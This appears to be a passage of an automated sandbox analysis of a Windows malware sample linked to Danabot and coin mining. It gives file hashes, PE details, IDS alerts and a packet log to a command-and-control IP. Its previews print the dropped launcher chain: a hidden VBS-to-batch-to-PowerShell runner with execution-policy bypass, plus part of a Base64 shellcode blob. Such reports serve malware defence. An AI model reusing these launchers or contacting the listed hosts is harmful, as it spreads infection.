                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):869
                                                                            Entropy (8bit):5.335919137132851
                                                                            Encrypted:false
                                                                            SSDEEP:24:KJBId3ka6KRfoCLEifoCh4Kax5DqBVKVrdFAMBJTH:Ckka6CHEuKK2DcVKdBJj
                                                                            MD5:5056A0B1A9F3BFC4DEEA8EA82F138D21
                                                                            SHA1:4F329DC5FB2244DD5541D41940BB7D8F4A550E23
                                                                            SHA-256:E81D648340FAE89466DF5710FA3974E241AFD5684A9F2A9A1E4421BC52EFEB50
                                                                            SHA-512:5E0D35D4C72821169305FF7381C36FFF1AC4CEFCEA2E7227E7BBC8C9C9E1117E1C8E2AD618B7D491B2BEAA6D8B38F6CCA2DA76219CD93327A97597A8F2DB61F3
                                                                            Malicious:false
                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):154
                                                                            Entropy (8bit):5.129050297455779
                                                                            Encrypted:false
                                                                            SSDEEP:3:j+qAHmFEm8nhcDQANX4E4RwOt+kiEaKC5SufyM1KXERASD8NXNWIjI:j+q9Nqh6XewknaZ5SuH1r4Nd5I
                                                                            MD5:590AD46C359C9CFEB5D3124E5C158E6B
                                                                            SHA1:B1A07AECEA93E96ADB84DCCC9B1179AB801C11EA
                                                                            SHA-256:A7DA956264ED0EB050700E1020EEC18B76B1268BF399C8632E61C4528FDBFB42
                                                                            SHA-512:94BE171BBE094C663CF7361CAC4544FA1018EB047D240D9F39F82593D71481C581BF57BC723067C7A046178777230A8E39486FE058ED1E58F37BE9DF0E05AB6E
                                                                            Malicious:true
                                                                            Preview:Set objShell = CreateObject("WScript.Shell")..objShell.Run chr(34) & "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" & chr(34), 0, False
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):171
                                                                            Entropy (8bit):5.154566944260334
                                                                            Encrypted:false
                                                                            SSDEEP:3:BKDDCMN2RsSLKHohLcygSSJJFIf9oM3KbQqPJH0cVERSouOt+kiEaKC5SufyM1Ky:SWK2t3h6B81R3KbQO0cqNwknaZ5SuH1b
                                                                            MD5:CE6C7A17D50542ACB52ACF97EB321E94
                                                                            SHA1:831A250BD72947546E534568A07E3846C6D4DFEB
                                                                            SHA-256:A49873D4235EE0892968F9453708B0D158A4980E4400C30B8E16FAC88E96C3FF
                                                                            SHA-512:52046328E18E609F3F5E34823747DE5426BC52A3064BEBBAA1A0D94318BB69D8E4350D2BBCC2880D4D8EAAD0EC0C7C9318D28C865CDD5DD150EFC2D10F69D41F
                                                                            Malicious:true
                                                                            Preview:.@echo off..timeout /t 30 /nobreak >nul..powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"..
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):11903058
                                                                            Entropy (8bit):6.001286550602484
                                                                            Encrypted:false
                                                                            SSDEEP:49152:ouEYV56Cuy/XQxTwsUcCnFapQCYTF7j1D2Srat2EO9MsskNirT2sh7Wv0yCLfcvh:r
                                                                            MD5:B6D611AF4BEA8EAAA639BBF024EB0E2D
                                                                            SHA1:0B1205546FD80407D85C9BFBED5FF69D00645744
                                                                            SHA-256:8CD3BF95CEDCF3469D0044976C66CBF22CD2FECF21AE4F94986D7211D6BA9A2B
                                                                            SHA-512:D8A4EC5BD986884959DB3EDFD48E2BF4C70EAD436F81EAB73B104AA0FF0F5DADFB6227CB2DAB1F979F0DBB3AAFBC1889ED571FB6E9444A09AE984B789314463D
                                                                            Malicious:true
                                                                            Preview:$Base64Shellcode = "6MD1hwDA9YcAMPEXpBBNkUDFfYRVQ3yvInI8M4ntArL8Wl9/MsdctFgAAAAA1kkIlrOpS+cPj2a2EVOQ05KNTYfQ4AZSALPZO0MFCDzNkh+QQPV7z+9gp/qtd66s8jhY0dN5HFsabYXl2lg1REifKK1HETr37UZTWesfJVAVfXlbEG1v5HpNvQ0JrANX7uoPeD6UvxsrKFTOLLOBcwmp+jMqSjOCc+Ffoy9S5upBheclDaAoW9B95yX35U/Od7YFyDOf45PGumgNadzuIdAiJ3VtcMM+pKc06MyHqDc0vw5WryQbnoDapNfe8vSW1hFDmnA0Ifbz2MozCzG4WVcNRBl1Zu8NNpUTMjHE6DqO8OhB8vbEmjR5j9iSw1JE0+VGDd3gbaPMMZ/2/BEvE7PSVB2Egc15AzGIRO1ycscdHgc53oIqCierNft0tge6jHxIznGqwS6tN1jIyGRlNS1DKsqwDkBdjUmIlWvEVSZHNQ2wTuzURXYPh5Oiqayot+XSITp+rMQgbjyufsBzFAgqAEZwt+rEUtZcvN8fvLNyUGn7npCzGEQyE9d1VKttlHE6r3I9qyvI50jaee64LDR2mOUVjn9b77vlNyOcoVGLPSFJWRdZ+UN9/0Na3Esn5vzzdTQPSVxbWVC7zVfyFVTwTZwo1vay4lZVBgs3jdG5lHobkzevh6+zYyf5luHi8mK+oBiSr/sv/N4sPO8PJCWvfCpIA2fh/Jv2SRW9754AAAAAAAAAAAEAAAADAAAAAAAAABkRvFSmEhLro5cn+JFulhQts0r6aEDUmLx8PvVGAEo4oH+0z/3YqZPt2EoeCJxNTnYYhpoznR2YcS19oj8NaFjXdIT/izGoglFFvN7LkUep2ocDSHaeyffSr83KrIWM0F+cBz5yQFNZI7ApliUsRw2Mr2gXmhg+dy/EHPEHzmS5q4YtRVNiBwpiEu1p0jPIAK0pNzzYp3vTBZhOwIQA
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                            Process:C:\Windows\System32\timeout.exe
                                                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):3.8842159555406113
                                                                            Encrypted:false
                                                                            SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2Htyst3g4t32vov:hYFRamFSQZ0lv5y/9JctESnQUq3tyMXZ
                                                                            MD5:B44FC16E07912C24524F74A8D3C9BCED
                                                                            SHA1:CCBA90D10D32BFF18221183C88146B378011CC3B
                                                                            SHA-256:FA51D90457861D7169034A0D4122B3AFDA2B4C07E157A4C18AF06D833C96ED2A
                                                                            SHA-512:1B9F0DD3387FDD1324828AA7CC94A98EC0344A5CAF1EDFFAAF7C0F98F134B09A4DCFD440E9374B0D3C80E099DFE43DABD838B0BE34C395C2F64C9334AE569516
                                                                            Malicious:false
                                                                            Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..
                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Entropy (8bit):6.456413272937089
                                                                            TrID:
                                                                            • Win64 Executable GUI (202006/5) 92.64%
                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                            • VXD Driver (31/22) 0.01%
                                                                            File name:yjYJ8QncaF.exe
                                                                            File size:122'880 bytes
                                                                            MD5:5b3ed060facb9d57d8d0539084686870
                                                                            SHA1:9cae8c44e44605d02902c29519ea4700b4906c76
                                                                            SHA256:7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
                                                                            SHA512:6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a
                                                                            SSDEEP:3072:EV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPQT:pt5hBPi0BW69hd1MMdxPe9N9uA069TB6
                                                                            TLSH:13C32756B2E01198DBF581F6D9920746EB7070311B15A3DB6BB863B31B2B8C69F3D390
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.b...z.................@.............................0.............................................
                                                                            Icon Hash:90cececece8e8eb0
                                                                            Entrypoint:0x140001000
                                                                            Entrypoint Section:.code
                                                                            Digitally signed:false
                                                                            Imagebase:0x140000000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:7182b1ea6f92adbf459a2c65d8d4dd9e
                                                                            Instruction
                                                                            dec eax
                                                                            sub esp, 28h
                                                                            dec ecx
                                                                            mov eax, 00000160h
                                                                            dec eax
                                                                            xor edx, edx
                                                                            dec eax
                                                                            mov ecx, 40020444h
                                                                            add dword ptr [eax], eax
                                                                            add byte ptr [eax], al
                                                                            call 00007F0544DA3ED8h
                                                                            dec eax
                                                                            xor ecx, ecx
                                                                            call 00007F0544DA3ED6h
                                                                            dec eax
                                                                            mov dword ptr [0001F420h], eax
                                                                            dec ebp
                                                                            xor eax, eax
                                                                            dec eax
                                                                            mov edx, 00001000h
                                                                            dec eax
                                                                            xor ecx, ecx
                                                                            call 00007F0544DA3EC3h
                                                                            dec eax
                                                                            mov dword ptr [0001F3FFh], eax
                                                                            dec eax
                                                                            mov eax, 4001F090h
                                                                            add dword ptr [eax], eax
                                                                            add byte ptr [eax], al
                                                                            dec eax
                                                                            mov dword ptr [0001F43Eh], eax
                                                                            call 00007F0544DAEEFAh
                                                                            call 00007F0544DAEB89h
                                                                            call 00007F0544DAACB0h
                                                                            call 00007F0544DAA2A3h
                                                                            call 00007F0544DA9B32h
                                                                            call 00007F0544DA9801h
                                                                            call 00007F0544DA8EF8h
                                                                            call 00007F0544DA83AFh
                                                                            call 00007F0544DA3FD2h
                                                                            call 00007F0544DACE95h
                                                                            call 00007F0544DAB6F4h
                                                                            dec eax
                                                                            mov edx, 4001F032h
                                                                            add dword ptr [eax], eax
                                                                            add byte ptr [eax], al
                                                                            dec eax
                                                                            lea ecx, dword ptr [0001F3C6h]
                                                                            call 00007F0544DAEF22h
                                                                            dec eax
                                                                            mov ecx, FFFFFFF5h
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1f1980xc8.data
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x5e8.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x10d4.pdata
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1f6a80x448.data
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .code0x10000x5a990x5c00bf90681e6a2fc3ae2cafaa536804f308False0.3649796195652174data5.470810722545147IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .text0x70000x105b50x106008a1a401c4bd106ea802d83f827d2ddd2False0.4909798425572519data6.359859898514709IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x180000x4b3d0x4c00546e073a6443174d5e09f21ab6d487ceFalse0.6635999177631579VAX-order 68k Blit mpx/mux executable6.6666895682624485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .pdata0x1d0000x10d40x1200e81bd35fde0f70c926459e823327da76False0.4683159722222222data4.881026996790752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x1f0000x23180x1600b8a0c84b8ae6315cdfe8c75a3ff58c0aFalse0.3283025568181818data4.297632525974567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x220000x5e80x600cbf4a4584e77982322f87d7f244a6699False0.6588541666666666data5.930170997889053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_RCDATA0x2221c0x144data1.0339506172839505
                                                                            RT_RCDATA0x223600xezlib compressed data1.5714285714285714
                                                                            RT_RCDATA0x223700x1very short file (no magic)9.0
                                                                            RT_RCDATA0x223740x9International EBCDIC text, with no line terminators, with overstriking1.8888888888888888
                                                                            RT_MANIFEST0x223800x267XML 1.0 document, ASCII text0.5284552845528455
                                                                            DLLImport
                                                                            msvcrt.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                                                            KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                                                            SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                                                            WINMM.DLLtimeBeginPeriod
                                                                            OLE32.DLLCoInitialize, CoTaskMemFree
                                                                            SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                                                                            USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                                                            GDI32.DLLGetStockObject
                                                                            COMCTL32.DLLInitCommonControlsEx
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-03-06T08:09:11.368287+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.44986280.240.16.67443TCP
                                                                            2025-03-06T08:09:12.012623+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.44973345.144.212.7716000TCP
                                                                            2025-03-06T08:09:12.012623+01002854648ETPRO MALWARE Win32/Danabot CnC Activity (GET)1192.168.2.44973345.144.212.7716000TCP
                                                                            2025-03-06T08:09:59.130589+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4560351.1.1.153UDP
                                                                            2025-03-06T08:10:45.850614+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449840204.79.197.203443TCP
                                                                            2025-03-06T08:11:00.849298+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4566101.1.1.153UDP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 6, 2025 08:09:11.368287086 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:11.373373985 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:11.373470068 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:11.376442909 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:11.381546974 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012528896 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012543917 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012563944 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012577057 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012587070 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012599945 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012620926 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012623072 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.012624025 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.012630939 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012641907 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012654066 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.012681961 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.012681961 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.012718916 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.017662048 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.017719030 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.017724991 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.017800093 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.017828941 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.017872095 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.018057108 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.061824083 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.103512049 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103528023 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103539944 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103578091 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.103579998 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103590965 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103602886 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103619099 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.103652000 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.103936911 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103949070 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103960037 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.103986025 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.104062080 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.104074001 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.104103088 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.104665995 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.104680061 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.104711056 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.104980946 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.104991913 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105005980 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105019093 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105021000 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.105051041 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.105478048 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105496883 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105509043 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105520964 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.105560064 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.105681896 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105699062 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105714083 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.105741024 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.106421947 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.106462002 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.194092035 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194106102 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194117069 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194196939 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.194201946 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194245100 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.194312096 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194323063 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194335938 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194348097 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194358110 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.194360018 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194389105 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.194890022 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194901943 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194915056 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194943905 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.194983959 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.194986105 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.194998026 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195008993 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195020914 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195044994 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.195066929 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.195694923 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195705891 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195729017 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195739985 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195743084 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.195751905 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195764065 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195777893 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195786953 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.195810080 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.195838928 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.195884943 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.196506023 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.196551085 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.196562052 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.196603060 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.196703911 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.196716070 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.196727991 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.196739912 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.196753025 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.196753025 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.196774960 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.196806908 CET4973316000192.168.2.445.144.212.77
                                                                            Mar 6, 2025 08:09:12.197464943 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.197489023 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.197500944 CET160004973345.144.212.77192.168.2.4
                                                                            Mar 6, 2025 08:09:12.197527885 CET4973316000192.168.2.445.144.212.77
